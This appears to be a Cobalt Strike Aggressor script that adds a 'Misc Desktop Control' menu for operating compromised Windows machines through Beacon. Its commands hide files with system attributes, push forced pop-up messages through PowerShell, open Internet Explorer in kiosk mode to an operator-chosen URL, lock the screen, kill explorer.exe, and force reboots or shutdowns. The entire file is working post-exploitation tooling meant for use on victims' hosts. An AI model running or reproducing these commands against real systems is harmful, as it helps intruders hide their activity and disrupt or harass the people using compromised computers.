menu "Misc Desktop Control"{
    item "hide files" {
        blog($1, "\c9========== hide files ==========");
        prompt_text("file path", "", lambda({    bshell(@ids, "attrib +h +s $1"); }, @ids => $1));
    }
    item "Show files" {
        blog($1, "\c9========== Show files ==========");
        prompt_text("File path", "", lambda({    bshell(@ids, "attrib -h -s $1"); }, @ids => $1));
    }    
    item "Chat pop-up box" {
        blog($1, "\c9========== Chat pop-up box ==========");
        prompt_text("Alert", "Helloï¼", lambda({
            bpowershell(@ids, 'Add-Type -AssemblyName Microsoft.VisualBasic; [Microsoft.VisualBasic.Interaction]::MsgBox("' . $1 . '", "OKOnly,MsgBoxSetForeground,SystemModal,Exclamation", "")' );
            blog(@ids,"Send a message: $1 ");
        }, @ids => $1));
    }
    item "IE Visit the designated website" {
        blog($1, "\c9========== IE Visit the designated website ==========");
        prompt_text("Enter the URL", "https://www.baidu.com", lambda({
            binput(@ids,"C:\\Progra~1\\Intern~1\\iexplore.exe -k $1");
            bshell(@ids, "C:\\Progra~1\\Intern~1\\iexplore.exe -k $1");
        }, @ids => $1));
    }    
    item "Lock screen" {
        blog($1, "\c9========== Lock screen ==========");
        prompt_text("Make sure the lock screen?", "", lambda({
        bshell(@ids, "rundll32.exe user32.dll,LockWorkStation");
        }, @ids => $1));
    }
    item "Hide Desktop"{
        blog($1, "\c9========== Hide Desktop ==========");
        bshell($1,"taskkill /F /IM explorer.exe");
    }
    item "Open Desktops"{
        blog($1, "\c9========== Open Desktops ==========");
        brun($1, "explorer.exe");
    }
	item "Reboot" {
        blog($1, "\c9========== Reboot ==========");
        prompt_text("Confirm reboot?", "", lambda({bshell(@ids, "shutdown -r -t 0");}, @ids => $1));
    }	
	item "Shutdown" {
        blog($1, "\c9========== Shutdown ==========");
        prompt_text("Confirm?", "", lambda({bshell(@ids, "shutdown -s -t 0");}, @ids => $1));
    }
}
